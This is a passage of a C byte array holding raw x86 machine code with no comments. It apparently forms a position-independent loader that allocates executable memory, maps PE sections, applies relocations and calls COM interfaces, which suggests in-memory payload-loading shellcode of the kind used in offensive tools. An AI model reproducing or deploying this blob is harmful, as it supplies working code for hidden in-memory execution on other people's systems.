313 0x33, 0xc0, 0x84, 0xc9, 0x74, 0x3f, 0x8d, 0x7d, 0x80, 0x8b, 0xd6, 0x2b,
314 0xfe, 0x80, 0xf9, 0x3b, 0x74, 0x12, 0x3d, 0x80, 0x00, 0x00, 0x00, 0x7d,
315 0x0b, 0x88, 0x0c, 0x17, 0x40, 0x42, 0x8a, 0x0a, 0x84, 0xc9, 0x75, 0xe9,
316 0x85, 0xc0, 0x74, 0x1d, 0xff, 0x75, 0x0c, 0x46, 0xc6, 0x44, 0x05, 0x80,
317 0x00, 0x03, 0xf0, 0x8d, 0x45, 0x80, 0x50, 0xe8, 0xc3, 0x16, 0x00, 0x00,
318 0x59, 0x59, 0x85, 0xc0, 0x75, 0xbc, 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f,
319 0x5e, 0xc9, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x1c, 0x83, 0x7d, 0x0c,
320 0x00, 0x74, 0x31, 0x6a, 0x1c, 0x8d, 0x45, 0xe4, 0x50, 0x8b, 0x45, 0x08,
321 0xff, 0x75, 0x0c, 0xff, 0x50, 0x44, 0x83, 0xf8, 0x1c, 0x75, 0x1d, 0x81,
322 0x7d, 0xf4, 0x00, 0x10, 0x00, 0x00, 0x75, 0x14, 0x81, 0x7d, 0xfc, 0x00,
323 0x00, 0x02, 0x00, 0x75, 0x0b, 0x83, 0x7d, 0xf8, 0x04, 0x75, 0x05, 0x33,
324 0xc0, 0x40, 0xc9, 0xc3, 0x33, 0xc0, 0xc9, 0xc3, 0x81, 0xec, 0x10, 0x02,
325 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0x18, 0x02, 0x00, 0x00, 0x33, 0xc0,
326 0x21, 0x44, 0x24, 0x04, 0x55, 0x8b, 0xac, 0x24, 0x24, 0x02, 0x00, 0x00,
327 0x8b, 0x8b, 0xb8, 0x00, 0x00, 0x00, 0x56, 0x57, 0x85, 0xc9, 0x0f, 0x84,
328 0xaa, 0x00, 0x00, 0x00, 0x55, 0x8d, 0x83, 0x24, 0x06, 0x00, 0x00, 0x50,
329 0x8d, 0x83, 0x14, 0x06, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x8b, 0xb4, 0x24,
330 0x28, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x78, 0x68, 0x8d, 0x44, 0x24, 0x20,
331 0x50, 0x8d, 0x46, 0x0c, 0x50, 0x53, 0xe8, 0x5b, 0x11, 0x00, 0x00, 0x8b,
332 0x55, 0x00, 0x8d, 0x7d, 0x04, 0x83, 0xc4, 0x0c, 0x8d, 0x83, 0x34, 0x06,
333 0x00, 0x00, 0x8b, 0x0a, 0x57, 0x50, 0x8d, 0x44, 0x24, 0x28, 0x50, 0x52,
334 0xff, 0x51, 0x0c, 0x85, 0xc0, 0x78, 0x34, 0x8b, 0x07, 0x8d, 0x54, 0x24,
335 0x14, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x78, 0x30,
336 0x83, 0x7c, 0x24, 0x14, 0x00, 0x74, 0x25, 0x8b, 0x0f, 0x8d, 0x45, 0x08,
337 0x50, 0x8d, 0x83, 0x54, 0x06, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x83,
338 0x44, 0x06, 0x00, 0x00, 0x50, 0x51, 0xff, 0x52, 0x24, 0xeb, 0x09, 0x83,
339 0x27, 0x00, 0xeb, 0x04, 0x83, 0x65, 0x00, 0x00, 0x85, 0xc0, 0x79, 0x34,
340 0x8d, 0x45, 0x08, 0x50, 0x8d, 0x83, 0x54, 0x06, 0x00, 0x00, 0x50, 0x8d,
341 0x83, 0x44, 0x06, 0x00, 0x00, 0x50, 0x6a, 0x00, 0x6a, 0x00, 0xff, 0x93,
342 0xb4, 0x00, 0x00, 0x00, 0xeb, 0x07, 0x8b, 0xb4, 0x24, 0x28, 0x02, 0x00,
343 0x00, 0x85, 0xc0, 0x79, 0x0b, 0x83, 0x65, 0x08, 0x00, 0x33, 0xc0, 0xe9,
344 0xfb, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51,
345 0x28, 0x85, 0xc0, 0x0f, 0x88, 0xe6, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
346 0x20, 0x50, 0x8d, 0x86, 0x0c, 0x01, 0x00, 0x00, 0x50, 0x53, 0xe8, 0xa3,
347 0x10, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x20, 0x50, 0xff,
348 0x93, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8b, 0xf8, 0x8d, 0x45,
349 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x0a, 0x57, 0x52, 0xff, 0x51, 0x30, 0x57,
350 0x8b, 0xf0, 0xff, 0x93, 0x88, 0x00, 0x00, 0x00, 0x85, 0xf6, 0x0f, 0x88,
351 0xa3, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x8d, 0x45, 0x10, 0x50, 0x8d,
352 0x83, 0x64, 0x06, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x52, 0xff, 0x11, 0x85,
353 0xc0, 0x0f, 0x88, 0x88, 0x00, 0x00, 0x00, 0x8b, 0xb4, 0x24, 0x28, 0x02,
354 0x00, 0x00, 0x83, 0x64, 0x24, 0x1c, 0x00, 0x8b, 0x86, 0x24, 0x05, 0x00,
355 0x00, 0x89, 0x44, 0x24, 0x18, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x01,
356 0x6a, 0x11, 0xff, 0x53, 0x6c, 0x8b, 0xf8, 0x85, 0xff, 0x74, 0x60, 0x8b,
357 0x57, 0x0c, 0x33, 0xc9, 0x39, 0x8e, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13,
358 0x8a, 0x84, 0x0e, 0x28, 0x05, 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b,
359 0x8e, 0x24, 0x05, 0x00, 0x00, 0x72, 0xed, 0x8b, 0x4d, 0x10, 0x8d, 0x45,
360 0x14, 0x50, 0x57, 0x51, 0x8b, 0x11, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00,
361 0xf7, 0xd8, 0x1b, 0xc0, 0x33, 0xd2, 0x40, 0x8b, 0xca, 0x89, 0x44, 0x24,
362 0x10, 0x8b, 0x47, 0x0c, 0x39, 0x96, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13,
363 0x88, 0x94, 0x0e, 0x28, 0x05, 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b,
364 0x8e, 0x24, 0x05, 0x00, 0x00, 0x72, 0xed, 0x57, 0xff, 0x53, 0x78, 0x8b,
365 0x44, 0x24, 0x10, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x10, 0x02, 0x00,
366 0x00, 0xc3, 0x81, 0xec, 0x3c, 0x01, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b,
367 0xb4, 0x24, 0x4c, 0x01, 0x00, 0x00, 0x57, 0xff, 0x76, 0x2c, 0xff, 0x76,
368 0x28, 0xff, 0x76, 0x4c, 0xff, 0x76, 0x48, 0x56, 0xe8, 0xc2, 0x0f, 0x00,
369 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xe8, 0xff, 0x76, 0x28, 0x89, 0x6c, 0x24,
370 0x34, 0xff, 0x76, 0x54, 0xff, 0x76, 0x50, 0x56, 0xe8, 0xaa, 0x0f, 0x00,
371 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xd8, 0xff, 0x76, 0x28, 0x89, 0x5c, 0x24,
372 0x44, 0xff, 0xb6, 0x8c, 0x01, 0x00, 0x00, 0xff, 0xb6, 0x88, 0x01, 0x00,
373 0x00, 0x56, 0xe8, 0x8c, 0x0f, 0x00, 0x00, 0x83, 0xc4, 0x3c, 0x8b, 0xf8,
374 0x89, 0x7c, 0x24, 0x10, 0x85, 0xed, 0x74, 0x27, 0x85, 0xdb, 0x74, 0x23,
375 0x85, 0xff, 0x74, 0x1f, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff,
376 0x36, 0x6a, 0x00, 0xff, 0xd5, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x1a, 0x83,
377 0xbe, 0x30, 0x02, 0x00, 0x00, 0x02, 0x75, 0x03, 0x50, 0xff, 0xd7, 0x83,
378 0xc8, 0xff, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x3c, 0x01, 0x00, 0x00,
379 0xc3, 0xff, 0x36, 0x56, 0x53, 0xe8, 0xa4, 0x13, 0x00, 0x00, 0x6a, 0x20,
380 0x8d, 0x44, 0x24, 0x38, 0x6a, 0x00, 0x50, 0xe8, 0xba, 0x13, 0x00, 0x00,
381 0x83, 0xc4, 0x18, 0x83, 0xbb, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x49,
382 0x8b, 0x03, 0x2d, 0x40, 0x02, 0x00, 0x00, 0x50, 0x8d, 0x83, 0x40, 0x02,
383 0x00, 0x00, 0x50, 0x8d, 0x43, 0x14, 0x50, 0x8d, 0x43, 0x04, 0x50, 0xe8,
384 0x73, 0x10, 0x00, 0x00, 0xff, 0x73, 0x2c, 0x8d, 0x83, 0xf0, 0x07, 0x00,
385 0x00, 0xff, 0x73, 0x28, 0x50, 0xe8, 0x3c, 0x0f, 0x00, 0x00, 0x83, 0xc4,
386 0x1c, 0x3b, 0x83, 0xf0, 0x08, 0x00, 0x00, 0x0f, 0x85, 0x7d, 0x02, 0x00,
387 0x00, 0x3b, 0x93, 0xf4, 0x08, 0x00, 0x00, 0x0f, 0x85, 0x71, 0x02, 0x00,
388 0x00, 0xff, 0x73, 0x2c, 0xff, 0x73, 0x28, 0xff, 0x73, 0x34, 0xff, 0x73,
389 0x30, 0x53, 0xe8, 0xcc, 0x0e, 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x43,
390 0x30, 0x85, 0xc0, 0x0f, 0x84, 0x66, 0xff, 0xff, 0xff, 0x8d, 0xb3, 0x44,
391 0x02, 0x00, 0x00, 0x8a, 0x0e, 0x33, 0xc0, 0x84, 0xc9, 0x74, 0x35, 0x8d,
392 0x7c, 0x24, 0x48, 0x8b, 0xd6, 0x2b, 0xfe, 0x80, 0xf9, 0x3b, 0x74, 0x12,
393 0x3d, 0x04, 0x01, 0x00, 0x00, 0x73, 0x0b, 0x88, 0x0c, 0x3a, 0x40, 0x42,
394 0x8a, 0x0a, 0x84, 0xc9, 0x75, 0xe9, 0x85, 0xc0, 0x74, 0x12, 0x46, 0xc6,
395 0x44, 0x04, 0x48, 0x00, 0x03, 0xf0, 0x8d, 0x44, 0x24, 0x48, 0x50, 0xff,
396 0x53, 0x30, 0xeb, 0xc3, 0x33, 0xff, 0x47, 0x39, 0xbb, 0x40, 0x02, 0x00,
397 0x00, 0x76, 0x38, 0x8d, 0x6b, 0x34, 0x8d, 0x73, 0x38, 0xff, 0x73, 0x2c,
398 0xff, 0x73, 0x28, 0xff, 0x76, 0x04, 0xff, 0x36, 0x53, 0xe8, 0x59, 0x0e,
399 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x45, 0x00, 0x85, 0xc0, 0x0f, 0x84,
400 0xda, 0x01, 0x00, 0x00, 0x47, 0x83, 0xc6, 0x08, 0x83, 0xc5, 0x04, 0x3b,
401 0xbb, 0x40, 0x02, 0x00, 0x00, 0x72, 0xd2, 0x8b, 0x6c, 0x24, 0x18, 0x8b,
402 0x83, 0xe4, 0x06, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x17, 0x53, 0xe8,
403 0x53, 0xf3, 0xff, 0xff, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0xad, 0x01, 0x00,
404 0x00, 0x8b, 0xb3, 0x20, 0x09, 0x00, 0x00, 0xeb, 0x18, 0x83, 0xf8, 0x03,
405 0x0f, 0x84, 0x9c, 0x01, 0x00, 0x00, 0x8d, 0xb3, 0x20, 0x09, 0x00, 0x00,
406 0x83, 0xf8, 0x01, 0x74, 0x04, 0x8b, 0x74, 0x24, 0x1c, 0x83, 0xbb, 0x6c,
407 0x05, 0x00, 0x00, 0x01, 0x74, 0x30, 0x53, 0xe8, 0x4f, 0xf1, 0xff, 0xff,
408 0x59, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbb, 0x6c, 0x05, 0x00, 0x00, 0x02,
409 0x0f, 0x84, 0x6c, 0x01, 0x00, 0x00, 0x53, 0xe8, 0x1d, 0xf2, 0xff, 0xff,
410 0x59, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbb, 0x6c, 0x05, 0x00, 0x00, 0x02,
411 0x0f, 0x84, 0x54, 0x01, 0x00, 0x00, 0x83, 0x7e, 0x08, 0x01, 0x0f, 0x84,
412 0xeb, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x24, 0x05, 0x00, 0x00, 0xbf, 0x30,
413 0x05, 0x00, 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0x03, 0xc7,
414 0x50, 0x6a, 0x00, 0xff, 0xd5, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0x27,
415 0x01, 0x00, 0x00, 0x57, 0x56, 0x55, 0xe8, 0xf3, 0x11, 0x00, 0x00, 0x8b,
416 0x46, 0x08, 0x83, 0xc4, 0x0c, 0x83, 0xf8, 0x03, 0x74, 0x2d, 0x83, 0xf8,
417 0x04, 0x74, 0x28, 0x83, 0xf8, 0x05, 0x74, 0x23, 0x83, 0xf8, 0x02, 0x0f,
418 0x85, 0xa2, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x28, 0x05, 0x00, 0x00, 0x50,
419 0x8d, 0x86, 0x28, 0x05, 0x00, 0x00, 0x50, 0xe8, 0xc8, 0x0f, 0x00, 0x00,
420 0x59, 0x59, 0xe9, 0x86, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x20, 0xb9,
421 0x00, 0x01, 0x00, 0x00, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x66, 0x8b,
422 0x46, 0x08, 0x66, 0x48, 0x66, 0x0b, 0xc1, 0x0f, 0xb7, 0xc0, 0x50, 0xff,
423 0x93, 0xe4, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xbd, 0x00, 0x00,
424 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x74, 0x24, 0x24,
425 0x50, 0xff, 0x54, 0x24, 0x28, 0x8b, 0xf8, 0x8d, 0x8e, 0x28, 0x05, 0x00,
426 0x00, 0x57, 0x8d, 0x44, 0x24, 0x28, 0x50, 0xff, 0xb6, 0x20, 0x05, 0x00,
427 0x00, 0x66, 0x8b, 0x46, 0x08, 0x51, 0xff, 0xb6, 0x24, 0x05, 0x00, 0x00,
428 0x8d, 0x8d, 0x28, 0x05, 0x00, 0x00, 0x66, 0x48, 0x51, 0xb9, 0x00, 0x01,
429 0x00, 0x00, 0x66, 0x0b, 0xc1, 0x0f, 0xb7, 0xc0, 0x50, 0xff, 0x93, 0xe8,
430 0x00, 0x00, 0x00, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x6a, 0x00, 0x57, 0x8b,
431 0xf0, 0xff, 0x54, 0x24, 0x20, 0x85, 0xf6, 0x75, 0x61, 0x8b, 0xf5, 0x83,
432 0x3e, 0x03, 0x74, 0x51, 0x83, 0x3e, 0x04, 0x74, 0x4c, 0x83, 0x3e, 0x01,
433 0x74, 0x18, 0x83, 0x3e, 0x02, 0x74, 0x13, 0x83, 0x3e, 0x05, 0x74, 0x05,
434 0x83, 0x3e, 0x06, 0x75, 0x41, 0x56, 0x53, 0xe8, 0x1f, 0x08, 0x00, 0x00,
435 0xeb, 0x36, 0x8d, 0x44, 0x24, 0x28, 0x50, 0x56, 0x53, 0xe8, 0xc6, 0xfa,
436 0xff, 0xff, 0x83, 0xc4, 0x0c, 0x85, 0xc0, 0x74, 0x0f, 0x8d, 0x44, 0x24,
437 0x28, 0x50, 0x56, 0x53, 0xe8, 0x8f, 0x00, 0x00, 0x00, 0x83, 0xc4, 0x0c,
438 0x8d, 0x44, 0x24, 0x28, 0x50, 0x53, 0xe8, 0x7d, 0xf5, 0xff, 0xff, 0xeb,
439 0x07, 0x56, 0x53, 0xe8, 0xa6, 0x03, 0x00, 0x00, 0x59, 0x59, 0x8b, 0x7c,
440 0x24, 0x10, 0x8b, 0x83, 0xe4, 0x06, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x74,
441 0x05, 0x83, 0xf8, 0x03, 0x75, 0x33, 0x8b, 0x83, 0x20, 0x09, 0x00, 0x00,
442 0x85, 0xc0, 0x74, 0x29, 0xff, 0xb3, 0x18, 0x09, 0x00, 0x00, 0x6a, 0x00,
443 0x50, 0xe8, 0xcc, 0x10, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0,
444 0x00, 0x00, 0x6a, 0x00, 0xff, 0xb3, 0x20, 0x09, 0x00, 0x00, 0xff, 0x54,
445 0x24, 0x20, 0x83, 0xa3, 0x20, 0x09, 0x00, 0x00, 0x00, 0xff, 0x33, 0x8b,
446 0xb3, 0x30, 0x02, 0x00, 0x00, 0x6a, 0x00, 0x53, 0xe8, 0xa1, 0x10, 0x00,
447 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x6a, 0x00, 0x53,
448 0xff, 0x54, 0x24, 0x20, 0x83, 0xfe, 0x02, 0x75, 0x04, 0x6a, 0x00, 0xff,
449 0xd7, 0x33, 0xc0, 0xe9, 0xa6, 0xfc, 0xff, 0xff, 0x81, 0xec, 0x78, 0x02,
450 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0x8c, 0x02, 0x00, 0x00,
451 0x33, 0xc0, 0x57, 0x8d, 0x7c, 0x24, 0x44, 0x33, 0xed, 0x21, 0x6c, 0x24,
452 0x1c, 0xab, 0xab, 0xab, 0xab, 0x33, 0xc0, 0x83, 0x3e, 0x02, 0x66, 0x89,
453 0x44, 0x24, 0x18, 0x0f, 0x85, 0x7e, 0x01, 0x00, 0x00, 0x8b, 0x84, 0x24,
454 0x94, 0x02, 0x00, 0x00, 0x8b, 0x48, 0x14, 0x8d, 0x78, 0x1c, 0x57, 0x51,
455 0x8b, 0x01, 0xff, 0x50, 0x40, 0x85, 0xc0, 0x0f, 0x88, 0x5b, 0x01, 0x00,
456 0x00, 0x8b, 0x07, 0x8d, 0x54, 0x24, 0x1c, 0x52, 0x50, 0x8b, 0x08, 0xff,
457 0x51, 0x48, 0x85, 0xc0, 0x0f, 0x88, 0xbe, 0x02, 0x00, 0x00, 0x8b, 0x9c,
458 0x24, 0x8c, 0x02, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x6a, 0x01,
459 0xff, 0x74, 0x24, 0x24, 0xff, 0x53, 0x7c, 0x8d, 0x44, 0x24, 0x28, 0x50,
460 0x6a, 0x01, 0xff, 0x74, 0x24, 0x24, 0xff, 0x93, 0x80, 0x00, 0x00, 0x00,
461 0x8b, 0x44, 0x24, 0x28, 0x2b, 0x44, 0x24, 0x2c, 0x83, 0xc0, 0x01, 0x0f,
462 0x84, 0xcc, 0x00, 0x00, 0x00, 0x6a, 0x01, 0x55, 0x6a, 0x0c, 0xff, 0x53,
463 0x70, 0x81, 0xc6, 0x0c, 0x04, 0x00, 0x00, 0x8b, 0xe8, 0x80, 0x3e, 0x00,
464 0x74, 0x70, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x56, 0x53,
465 0xe8, 0x19, 0x0b, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x14,
466 0x50, 0x8d, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x50, 0xff, 0x53, 0x68,
467 0xff, 0x74, 0x24, 0x14, 0x8b, 0xf0, 0xb8, 0x08, 0x20, 0x00, 0x00, 0x6a,
468 0x00, 0x6a, 0x08, 0x66, 0x89, 0x44, 0x24, 0x40, 0xff, 0x53, 0x70, 0x33,
469 0xc9, 0x89, 0x44, 0x24, 0x3c, 0x89, 0x4c, 0x24, 0x10, 0x39, 0x4c, 0x24,
470 0x14, 0x76, 0x5b, 0xff, 0x34, 0x8e, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00,
471 0x50, 0x8d, 0x44, 0x24, 0x14, 0x50, 0xff, 0x74, 0x24, 0x44, 0xff, 0x53,
472 0x74, 0x8b, 0x4c, 0x24, 0x10, 0x41, 0x89, 0x4c, 0x24, 0x10, 0x3b, 0x4c,
473 0x24, 0x14, 0x72, 0xdb, 0xeb, 0x34, 0x6a, 0x01, 0x6a, 0x00, 0xb8, 0x08,
474 0x20, 0x00, 0x00, 0x6a, 0x08, 0x66, 0x89, 0x44, 0x24, 0x40, 0xff, 0x53,
475 0x70, 0x83, 0x64, 0x24, 0x10, 0x00, 0x89, 0x44, 0x24, 0x3c, 0x8d, 0x44,
476 0x24, 0x18, 0x50, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x44,
477 0x24, 0x14, 0x50, 0xff, 0x74, 0x24, 0x44, 0xff, 0x53, 0x74, 0x83, 0x64,
478 0x24, 0x10, 0x00, 0x8d, 0x44, 0x24, 0x34, 0x50, 0x8d, 0x44, 0x24, 0x14,
479 0x50, 0x55, 0xff, 0x53, 0x74, 0x83, 0x64, 0x24, 0x4c, 0x00, 0x8d, 0x54,
480 0x24, 0x64, 0x52, 0x33, 0xc0, 0x8d, 0x74, 0x24, 0x48, 0x40, 0x66, 0x89,
481 0x44, 0x24, 0x48, 0x8b, 0x07, 0x55, 0x83, 0xec, 0x10, 0x8b, 0xfc, 0x8b,
482 0x08, 0x50, 0xa5, 0xa5, 0xa5, 0xa5, 0xff, 0x91, 0x94, 0x00, 0x00, 0x00,
483 0x85, 0xed, 0x0f, 0x84, 0x88, 0x01, 0x00, 0x00, 0xff, 0x74, 0x24, 0x3c,
484 0xff, 0x53, 0x78, 0x55, 0xff, 0x53, 0x78, 0xe9, 0x78, 0x01, 0x00, 0x00,
485 0x21, 0x2f, 0xe9, 0x71, 0x01, 0x00, 0x00, 0x8b, 0x9c, 0x24, 0x8c, 0x02,
486 0x00, 0x00, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x86,
487 0x0c, 0x02, 0x00, 0x00, 0x50, 0x53, 0xe8, 0x0b, 0x0a, 0x00, 0x00, 0x83,
488 0xc4, 0x0c, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0xff, 0x93,
489 0x84, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x89, 0x6c, 0x24, 0x20, 0x85, 0xed,
490 0x0f, 0x84, 0x39, 0x01, 0x00, 0x00, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00,
491 0x00, 0x50, 0x8d, 0x86, 0x0c, 0x03, 0x00, 0x00, 0x50, 0x53, 0xe8, 0xd7,
492 0x09, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00,
493 0x00, 0x50, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x24,
494 0x85, 0xc0, 0x0f, 0x84, 0xfd, 0x00, 0x00, 0x00, 0x8b, 0x8c, 0x24, 0x94,
495 0x02, 0x00, 0x00, 0x8b, 0x51, 0x14, 0x8d, 0x41, 0x18, 0x50, 0x55, 0x52,
496 0x8b, 0x0a, 0x89, 0x44, 0x24, 0x3c, 0xff, 0x51, 0x44, 0x8b, 0xf8, 0x85,
497 0xff, 0x0f, 0x88, 0xcf, 0x00, 0x00, 0x00, 0x81, 0xc6, 0x0c, 0x04, 0x00,
498 0x00, 0x33, 0xed, 0x80, 0x3e, 0x00, 0x74, 0x7e, 0x8d, 0x84, 0x24, 0x84,
499 0x00, 0x00, 0x00, 0x50, 0x56, 0x53, 0xe8, 0x7b, 0x09, 0x00, 0x00, 0x83,
500 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x8d, 0x84, 0x24, 0x88, 0x00,
501 0x00, 0x00, 0x50, 0xff, 0x53, 0x68, 0xff, 0x74, 0x24, 0x14, 0x8b, 0xf0,
502 0x55, 0x6a, 0x0c, 0xff, 0x53, 0x70, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x4a,
503 0x33, 0xc9, 0x89, 0x4c, 0x24, 0x10, 0x39, 0x4c, 0x24, 0x14, 0x76, 0x3e,
504 0xff, 0x34, 0x8e, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x6a, 0x08, 0x89,
505 0x44, 0x24, 0x60, 0x58, 0x66, 0x89, 0x44, 0x24, 0x54, 0x8d, 0x44, 0x24,
506 0x54, 0x50, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x55, 0xff, 0x53, 0x74, 0x8b,
507 0xf8, 0x85, 0xff, 0x79, 0x06, 0x55, 0xff, 0x53, 0x78, 0x33, 0xed, 0x8b,
508 0x4c, 0x24, 0x10, 0x41, 0x89, 0x4c, 0x24, 0x10, 0x3b, 0x4c, 0x24, 0x14,
509 0x72, 0xc2, 0x85, 0xff, 0x78, 0x3c, 0x8b, 0x44, 0x24, 0x30, 0x8d, 0x54,
510 0x24, 0x74, 0x52, 0x55, 0x83, 0xec, 0x10, 0x8d, 0x74, 0x24, 0x5c, 0x8b,
511 0x00, 0x8b, 0xfc, 0x6a, 0x00, 0x8b, 0x08, 0xa5, 0x68, 0x18, 0x01, 0x00,
512 0x00, 0xa5, 0xa5, 0xa5, 0x8b, 0x74, 0x24, 0x44, 0x56, 0x50, 0xff, 0x91,
513 0xe4, 0x00, 0x00, 0x00, 0x85, 0xed, 0x74, 0x04, 0x55, 0xff, 0x53, 0x78,
514 0x8b, 0x6c, 0x24, 0x20, 0xeb, 0x08, 0x8b, 0x6c, 0x24, 0x20, 0x8b, 0x74,
515 0x24, 0x24, 0x56, 0xff, 0x93, 0x88, 0x00, 0x00, 0x00, 0x55, 0xff, 0x93,
516 0x88, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x81,
517 0xc4, 0x78, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec, 0x24, 0x02, 0x00, 0x00,
518 0x53, 0x8b, 0x9c, 0x24, 0x2c, 0x02, 0x00, 0x00, 0x33, 0xc0, 0x55, 0x8b,
519 0xac, 0x24, 0x34, 0x02, 0x00, 0x00, 0x81, 0xc5, 0x28, 0x05, 0x00, 0x00,
520 0x89, 0x44, 0x24, 0x1c, 0x57, 0x50, 0x89, 0x6c, 0x24, 0x28, 0x8b, 0x7d,
521 0x3c, 0x03, 0xfd, 0x89, 0x7c, 0x24, 0x20, 0xff, 0x53, 0x38, 0x66, 0x8b,
522 0x4f, 0x04, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x50, 0x3c, 0x66, 0x3b, 0x4c,
523 0x02, 0x04, 0x0f, 0x85, 0xed, 0x03, 0x00, 0x00, 0x8b, 0x4f, 0x50, 0xb8,
524 0x00, 0x30, 0x00, 0x00, 0x56, 0x6a, 0x40, 0x50, 0x89, 0x44, 0x24, 0x1c,
525 0xb8, 0x00, 0x10, 0x00, 0x00, 0x03, 0xc8, 0x51, 0x6a, 0x00, 0xff, 0x53,
526 0x3c, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0xc5, 0x03, 0x00, 0x00, 0xff,
527 0x77, 0x54, 0x55, 0x56, 0xe8, 0xb5, 0x0c, 0x00, 0x00, 0x0f, 0xb7, 0x6f,
528 0x14, 0x33, 0xc0, 0x83, 0x64, 0x24, 0x1c, 0x00, 0x83, 0xc4, 0x0c, 0x83,
529 0xc5, 0x2c, 0x66, 0x3b, 0x47, 0x06, 0x73, 0x32, 0x8b, 0x5c, 0x24, 0x10,
530 0x03, 0xef, 0xff, 0x75, 0xfc, 0x8b, 0x45, 0x00, 0x03, 0x44, 0x24, 0x2c,
531 0x50, 0x8b, 0x45, 0xf8, 0x03, 0xc6, 0x50, 0xe8, 0x82, 0x0c, 0x00, 0x00,
532 0x0f, 0xb7, 0x47, 0x06, 0x8d, 0x6d, 0x28, 0x83, 0xc4, 0x0c, 0x43, 0x3b,
533 0xd8, 0x72, 0xdb, 0x8b, 0x9c, 0x24, 0x38, 0x02, 0x00, 0x00, 0x8b, 0x87,
534 0xa0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x76, 0x8d, 0x2c, 0x30, 0x8b,
535 0xc6, 0x2b, 0x47, 0x34, 0x83, 0x7d, 0x00, 0x00, 0x89, 0x44, 0x24, 0x10,
536 0x74, 0x64, 0x8d, 0x4d, 0x08, 0xeb, 0x4b, 0x0f, 0xb7, 0x01, 0x8b, 0xd0,
537 0x25, 0x00, 0xf0, 0x00, 0x00, 0x89, 0x54, 0x24, 0x18, 0x66, 0x3b, 0x44,
538 0x24, 0x14, 0x75, 0x25, 0x8b, 0xc2, 0x25, 0xff, 0x0f, 0x00, 0x00, 0x89,
539 0x44, 0x24, 0x18, 0x03, 0x45, 0x00, 0x8b, 0x0c, 0x30, 0x03, 0x4c, 0x24,
540 0x10, 0x8b, 0x44, 0x24, 0x18, 0x03, 0x45, 0x00, 0x89, 0x0c, 0x30, 0x8b,
541 0x4c, 0x24, 0x1c, 0xeb, 0x0e, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x66, 0x3b,
